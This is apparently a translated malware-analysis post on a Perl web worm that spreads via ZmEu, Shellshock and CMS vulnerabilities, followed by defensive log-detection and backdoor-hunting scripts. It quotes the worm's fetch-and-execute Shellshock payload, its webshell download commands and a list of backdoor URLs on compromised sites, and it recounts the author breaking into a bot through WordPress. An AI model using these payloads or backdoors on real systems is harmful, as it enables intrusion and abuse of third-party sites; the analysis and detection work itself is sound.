A new and powerful generation of web worm has recently been captured; it has already infected more than a thousand websites. The worm functions as a comprehensive vulnerability scanner. It mainly exploits high-risk vulnerabilities in well-known web applications such as phpMyAdmin, WordPress, Joomla and Magento, along with the Shellshock vulnerability, weak SSH passwords and SQL injection, and it attempts automatic privilege escalation.
An infected bot receives commands from the control server to launch DDoS attacks, scan for vulnerabilities in order to infect further hosts, act as an HTTP proxy, and run IRC servers. The analysis showed that the infected hosts already had 1000 websites available as web proxies. I will share all of the source code involved (including the notorious phpMyAdmin worm ZmEu) later.
0x01 Origin
Looking through the web logs of a VPS, we saw signs of attack, including ZmEu's User-Agent and a Shellshock payload.
We then got a shell on one bot (by downloading the database configuration file through a WordPress vulnerability, logging in to WordPress with the database password and, since that account had no permission to install plug-ins, inserting PHP code for the site's insertPHP plug-in to parse at the place where articles are edited; this took more than an hour of fiddling).
We found a powerful PHP Trojan in the website directory, supporting safe-mode bypass, proxy installation and more, so we decided to dig deeper.
Among the source code downloaded to this bot we found the shocking CC attack program.
0x02 Analysis
This worm has only tens of thousands of lines of Perl script code, so please point out any mistakes in my analysis. Once a bot node detects a vulnerability on a server, it downloads and executes the control script on that host; the host becomes a bot, and finally an e-mail is sent to the controller to register the newly controlled host. For example, the Shellshock payload:
"() { :;}; /usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\"; system(\"wget http://xxxserver.com/shell.txt -O /tmp/shell.txt; curl -o /tmp/shell.txt http://xxxserver.com/shell.txt; perl /tmp/shell.txt; rm -rf shell.txt\");'"
We will follow the web-vulnerability infection process as the main thread. For brevity, I omit some code.
Initialize the remote download server addresses:
my $rceinjector  = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/error.php";
my $rceinjector2 = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/xml.php";
#my $arbitrary    = "http://www.handelwpolsce.pl/images/Sport/rce.php";
#my $hostinjector = "wordpress.com.longlifeweld.com.my";
my $thumbid  = "http://".$hostinjector."/petx.php";
my $thumbidx = "http://".$hostinjector."/cpx.php";
The Linux download commands are passed as web parameters: after a bot successfully exploits a vulnerability and gets a shell, it sends the webshell the commands that download the control scripts.
my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;wget%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;wget%20http%3A%2F%2F".$hostinjector."%2Fmagic1.php";
my $lwpdon  = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fcpx.php";
my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fcpx.php";
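The three request indicators described so far (the ZmEu User-Agent and Shellshock payload seen in the VPS logs, and the URL-encoded ?cmd= download chains above) can all be picked out of ordinary access logs. The following detector is an added example written for this article, not code from the original post or from the worm; it parses combined-format log lines, decodes the cmd parameter back into the shell command the bot sent, and flags each indicator. The sample log lines are constructed, and the host "injector.example" is a placeholder rather than real infrastructure.

```python
"""Flag the worm's request indicators in combined-format web access logs.

Added example, not code from the original post or from the worm. It checks
each log line for the three indicators the post describes: the ZmEu scanner
User-Agent, a Shellshock function-definition prefix ("() {") in a request
field, and a webshell "?cmd=" parameter carrying a download chain
(wget / curl / lwp-download). The log lines are constructed for this example
and the host "injector.example" is a placeholder, not real infrastructure.
"""
import re
from urllib.parse import unquote

# Apache/nginx combined log format:
# ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")            # bash function-definition prefix
CMD_PARAM_RE = re.compile(r"[?&]cmd=([^&\s]*)")     # the worm's ?cmd= webshell parameter
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|lwp-download|fetch)\b")


def decode_cmd(target):
    """Return the URL-decoded ?cmd= value of a request target, or None."""
    m = CMD_PARAM_RE.search(target)
    return unquote(m.group(1)) if m else None


def classify(line):
    """Return the indicator names found in one access-log line (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []                      # not a combined-format line; skip rather than guess
    hits = []
    ua, referer, target = m["ua"], m["referer"], m["target"]
    if "ZmEu" in ua:
        hits.append("zmeu-ua")
    # Shellshock payloads ride in any header the CGI copies into the environment;
    # UA and Referer are the usual carriers, and the target may hold an encoded copy.
    if any(SHELLSHOCK_RE.search(unquote(field)) for field in (ua, referer, target)):
        hits.append("shellshock")
    cmd = decode_cmd(target)
    if cmd is not None and DOWNLOADER_RE.search(cmd):
        hits.append("webshell-download-chain")
    return hits


def scan(lines):
    """Map line index -> indicators for every line that triggers at least one."""
    report = {}
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            report[i] = hits
    return report


# Constructed sample log (documentation-range addresses, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2015:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [10/Oct/2015:13:55:40 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "-" '
    '"ZmEu"',
    '198.51.100.7 - - [10/Oct/2015:13:55:41 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 10 "-" '
    '"() { :;}; /usr/bin/perl -e \'print XSUCCESS\'"',
    '198.51.100.7 - - [10/Oct/2015:13:56:02 +0000] "GET /wp-includes/errors.php?cmd=wget%20http%3A%2F%2F'
    'injector.example%2Fmagic.php;wget%20http%3A%2F%2Finjector.example%2Fbtx.php HTTP/1.1" 200 88 "-" '
    '"Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits, decode_cmd(LOG_RE.match(SAMPLE_LOG[idx])["target"]))
```

Decoding the cmd value before matching matters: the worm encodes spaces and slashes, so a filter looking for the literal string "wget http://" in raw log lines would miss every one of the $wgetdon, $lwpdon and $curldon requests.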
Initialize the 1000 web-proxy backdoor addresses, to be harvested in batches later:
my @randombarner = ("http://www.lesyro.cz/administrator/components/com_media/helpers/errors.php",
"http://www.villaholidaycentre.co.uk/includes/js/calendar/lang/seka.php",
"http://viewwebinars.com/wp-includes/errors.php",
"http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php",
"http://www.linuxcompany.nl/modules/mod_login/error.php",
"http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php",
"http://liftoffconsulting.ca/wp-includes/errors.php",
"http://www.voileenligne.com/audio/komo.php",
"http://www.gingerteastudio.com//wp-content/uploads/components/search.php",
"www.audiovisionglobal.pe/online/shortdes/js/calendar/lang/search.php",
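The backdoor list is useful to a defender for where the files sit: upload, image and JavaScript-language directories of WordPress and Joomla sites, which should never contain PHP. The script below is an added example written for this article (not code from the original post or from the worm). It walks a web root and reports PHP files whose relative path equals the path component of one of the URLs listed above, plus any PHP file under an asset directory; the asset-directory rule is a heuristic, and hits from it need review. The demo web root it builds in a temporary directory is constructed for the example.

```python
"""Hunt a web root for PHP files where the worm plants its proxy backdoors.

Added example, not code from the original post or from the worm. The
@randombarner list in the post shows where the backdoors live: asset and
library directories of WordPress/Joomla sites that should never hold PHP
(uploads, images, tmp-upload-images, js/calendar/lang, ...). This walks a web
root and reports (a) files whose relative path equals the path component of a
known backdoor URL from the post and (b) any PHP file under such an asset
directory. The demo web root is constructed in a temporary directory.
"""
import os
import tempfile
from urllib.parse import urlsplit

# Backdoor URLs quoted in the post; only their path component is used.
KNOWN_BACKDOOR_URLS = (
    "http://www.lesyro.cz/administrator/components/com_media/helpers/errors.php",
    "http://www.villaholidaycentre.co.uk/includes/js/calendar/lang/seka.php",
    "http://viewwebinars.com/wp-includes/errors.php",
    "http://www.pmi.org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php",
    "http://www.linuxcompany.nl/modules/mod_login/error.php",
    "http://liftoffconsulting.ca/wp-includes/errors.php",
    "http://www.gingerteastudio.com//wp-content/uploads/components/search.php",
)


def _normalize(path):
    """Collapse doubled slashes and strip the leading one: '//a//b' -> 'a/b'."""
    while "//" in path:
        path = path.replace("//", "/")
    return path.lstrip("/")


KNOWN_BACKDOOR_PATHS = {_normalize(urlsplit(u).path) for u in KNOWN_BACKDOOR_URLS}

# Directory fragments that hold uploads, images or client-side assets; a PHP
# file beneath any of them is suspicious by policy (heuristic: review the hits).
ASSET_DIRS = ("wp-content/uploads", "images", "tmp-upload-images",
              "js/calendar/lang", "audio")
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".php7")


def hunt(webroot):
    """Return sorted (relative_path, reason) pairs for suspicious PHP files."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            rel = os.path.relpath(os.path.join(dirpath, name), webroot).replace(os.sep, "/")
            if rel in KNOWN_BACKDOOR_PATHS:
                findings.append((rel, "known backdoor path"))
            elif any(f"/{d}/" in f"/{rel}" for d in ASSET_DIRS):
                findings.append((rel, "php in asset directory"))
    return sorted(findings)


def build_demo_webroot():
    """Create a throwaway web root: a few legitimate files plus three planted ones."""
    root = tempfile.mkdtemp(prefix="webroot-")
    legitimate = ["index.php", "wp-includes/functions.php",
                  "wp-content/uploads/2015/photo.jpg",
                  "components/com_content/controller.php"]
    planted = ["wp-includes/errors.php",                    # path from the post's list
               "wp-content/uploads/components/search.php",  # path from the post's list
               "images/Sport/rce.php"]                      # caught by the asset-dir rule only
    for rel in legitimate + planted:
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("<?php // placeholder\n" if rel.endswith(".php") else "")
    return root


if __name__ == "__main__":
    for rel, reason in hunt(build_demo_webroot()):
        print(f"{reason:24} {rel}")
```

Exact-path matching alone would miss the same backdoor dropped under a different name, which is why the directory rule is there; conversely, a legitimate plug-in that ships PHP under an uploads directory will trip it, so treat the second reason as a lead rather than a verdict.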